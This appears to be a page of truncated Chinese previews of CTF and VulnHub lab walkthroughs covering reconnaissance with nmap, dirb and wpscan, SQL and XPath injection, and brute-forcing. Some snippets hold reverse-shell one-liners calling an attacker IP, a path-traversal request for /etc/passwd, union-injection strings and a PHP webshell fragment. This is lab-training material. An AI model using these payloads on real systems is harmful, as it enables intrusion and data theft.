来到sql注入骚姿势,我们一点一点开始学 我们来到这道题,然后尝试注入,结果发现 拼接'or '1'='1 'or '1'='2如果是字符型注入则会报错,然而并没有而是显示的页面一样, 通过常规注入,回显的页面都是 最后,我们发现这道题是xpath报错注入,函数注入 extractvalue() extractvalue() :对XML文档进行查询的函数 语法:extractvalue(目标xml文档,xml路径) 第一个参数 :   第一个参数可以传入目标xml文档 第二个参数: xml中的位

使用nmap 工具在局域网里进行侦探,查看局域网里ip存活数量 root@kali:~# nmap -sP 192.168.1.0/24 Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-09 20:59 EST Nmap scan report for 192.168.1.1 (192.168.1.1) Host is up (0.0026s latency). MAC Address: EC:82:63:85:01:E0 (Unknown)

先上一张图: 靶机信息及地址:https://www.vulnhub.com/entry/ai-web-1,353/ 下载到靶机后,在VMware里打开,kali使用arp-scan -l 扫到 在浏览器里打开,只有这样一句话:(我谷歌了一下这句话,没找到啥,,,,多此一举==) 然后开始dirsearch扫目录: python dirsearch.py -u http://192.168.182.133/ -e * 只有这两个有用的信息 查看robots.txt文件 访问没有得到什么东西,继续

VM上配置 VMware users will need to manually edit the VM's MAC address to: 08:00:27:A5:A6:76 VM上选择本靶机,编辑->网络适配器->高级->修改MAC地址 打开靶机 信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.150 #综合扫描 访问web端,查看源码 robots.txt里面的几个目录访问后都是一张图片 那就扫描下目录,dirb结合

信息搜集 nmap -sP 192.168.146.0/24 #找靶机ip nmap -sS -Pn -A 192.168.146.143 #扫描靶机信息 22和80端口,老朋友了. 先直接访问http://192.168.146.143/,显示http://wordy/. 在C:\Windows\System32\drivers\etc下的HOSTS文件中增加192.168.146.143 wordy 又是wp,直接上wpscan扫描. wpscan --url http://wordy/ -

出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) 总结与反思: 1.收集信息要全面 2.用snmp-check检查snmp目标是否开启服务 3.smbmap尝试匿名用户anonymous来枚举目标的共享资源,可能会枚举成功 4.使用smbclient连接到smb进行命令操作 5.使用ole来分析宏 6.使用mssqlclient.py来连接MSSQL 7.mssqlclient.py开启Windows Authentication参数

仅供个人娱乐 靶机信息 下载地址:http://www.five86.com/downloads/DC-5.zip 一.主机扫描 arp-scan -l nmap -p 1-65535 -A  -sV 192.168.17.131 二.信息收集 dirb http://192.168.17.131 /usr/share/wordlists/dirb/big.txt 用kali自带工具wfuzz(自带字典)扫描文件 cd /usr/share/wordlists/wfuzz/general wfu

仅供个人娱乐 靶机信息 下载地址:https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/ 一.网卡设置 设置为NAT模式, 使用vi去修改/etc/network/interface 修改保存重启,启动网卡username 3: technawi   password : 3vilH@ksor 二.主机探测 nmap -sn 192.168.47.0/24 nmap -n -vv -T5 -sn 192.168.47.0/24 | grep -

仅供个人娱乐 靶机信息 靶机下载地址:https://download.vulnhub.com/xxe/XXE.zip 一.主机探测 二.端口服务识别 nmap -sV 192.168.181.149 存在web端口  打开web界面 三.漏洞查找和利用 扫描目录 dirb http://192.168.181.149 打开网页 打开目录 使用burp抓包 (个人)网络问题     靶机 ip改为 192.168.204.130 打开网络http://192.168.204.130/xxe/ 

仅供个人娱乐 靶机信息 Raven 下载地址:https://www.vulnhub.com/entry/raven-1,256/ 一.主机探测 端口信息 目录扫描 80端口 根据页面开始搜寻有用的信息 得到信息 Wpscan漏洞利用 右上角BLOG ,会发现是 WordPress 系统.于是使用 WPScan 进行扫描 wpscan --url http://192.168.204.131/wordpress/  -ep -et -eu -ep  枚举插件信息 -et  扫描主题 -eu  枚

仅供个人娱乐 靶机信息 靶机下载地址:https://www.vulnhub.com/entry/typhoon-102,267/ 一.主机探测 arp-scan -l nmap -sV -p- -A 192.168.181.136 扫描之后发现目标开放了很多的端口比如21(ftp),22(ssh),25(smtp),53(dns),80(http),-2049(nfs-acl),3306(mysql),5432(postgresql),6379(redis),8080(http),27017(

仅供个人娱乐 靶机信息 靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/一.主机发现  arp-scan -l 二.端口扫描 1. masscan --rate=10000 -p0-65535 192.168.181.133 三.端口服务识别 nmap -sV -n 192.168.181.133 四.漏洞查找与利用 1.浏览器访问http://192.168.181.133,发现发现登录界面,尝试目录扫描,没发现有用信息 dirb http

仅供个人娱乐 靶机信息 Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提取码:q6zo 信息收集 nmap全端口扫 nmap -sS -Pn -A -p- -n 192.168.181.192 别的不管,6667这个端口一定不能放过,想到之前在Metasploitable2渗透实战中,在6667端口运行着 UnreaIRCD IRC,直接上msf打掉,这次虽然没成功,但要保持警惕. smb枚举探测 看到1

仅供个人娱乐 靶机信息 https://download.vulnhub.com/djinn/djinn.ova 一.主机探测 二.漏洞的查找和利用 21端口ftp 匿名登录 7331端口 命令执行  反弹窗口 nc -e /bin/bash 192.168.174.129 4444 尝试绕过 bash -i >& /dev/tcp/192.168.174.129/4444 0>&1 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNi4xMjk

仅供个人娱乐 靶机信息 https://www.vulnhub.com/entry/sunset-sunrise,406/ 一.主机探测 二.信息收集 nmap -sS -sV -T5 -A -p- http://192.168.174.132:8080/ 三.漏洞利用 构造poc http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd http://192.168.174.132:8080/..%2

仅供个人娱乐 靶机信息 https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 一.主机探测 二.信息收集 访问一下web站点,提示只能从本地登录,否则会被当作hacker拦截. 三.漏洞查找和利用 注册账户登录  信息收集 eweuhtandingan skuyatuh sedihaingmah cedihhihihi aingmaung qwerty!!! abdikasepak dorrrrr sundatea indONEsia

仅供个人娱乐 靶机信息 下载地址:https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download 一.主机探测 二.信息收集 22/tcp filtered ssh 53/tcpopendomain 80/tcp filtered http 110/tcpopenpop3? 139/tcpopennetbios-ssn Samba smbd3.X-4.X(workgroup:WORKGROUP) 1

仅供个人娱乐 靶机信息 下载地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ 一.主机扫描 二.信息收集和漏洞利用     FTP服务允许匿名用户(anonymous)登录 或者 由于version_control存在于patrick路径中,我们是没有权限去获取的,所以尝试将其转移到/upload路径中 敏感信息 ProFTPd: 1.3.5 /var/www/tryingharderisjoy 故障 更改ip use exp

仅供个人娱乐 靶机信息 下载地址:https://pan.baidu.com/s/1dzs_qx-YwYHk-vanbUeIxQ 一.主机扫描 二.信息收集 三.漏洞的查找和利用 boris    InvincibleHack3r 进行登录 转化为小写登录成功 pop3 为55007端口 爆破 hydra -L 2.txt -P /usr/share/wordlists/fasttrack.txt pop3://192.168.56.130 -s 55007 boris        secre

仅供个人娱乐 靶机信息 下载地址:https://www.vulnhub.com/entry/homeless-1,215/ 一.主机扫描 二.信息收集 在网页源码和页面上,我们发现User-Agent 三.漏洞利用 在agaent字段填上这个图片的字段 "Cyber​​dog Sledding Portal" 或使用字典:rockyou,来爆这个UA 打开该网页 上传小马 上传命令 <?=`ls`;                   #这句代码在php里等同于<?php

仅供个人娱乐 靶机信息 下载地址:http://www.five86.com/downloads/DC-9.zip 一.主机扫描 二.信息收集 三.漏洞查找和利用 发现search的地方可能有sql注入 1' union select 1,2,3,4,5,6# -1' union select 1,2,3,4,5,database()--+ # -1'union select 1,2,3,4,5,group_concat(table_name) from information_schema.t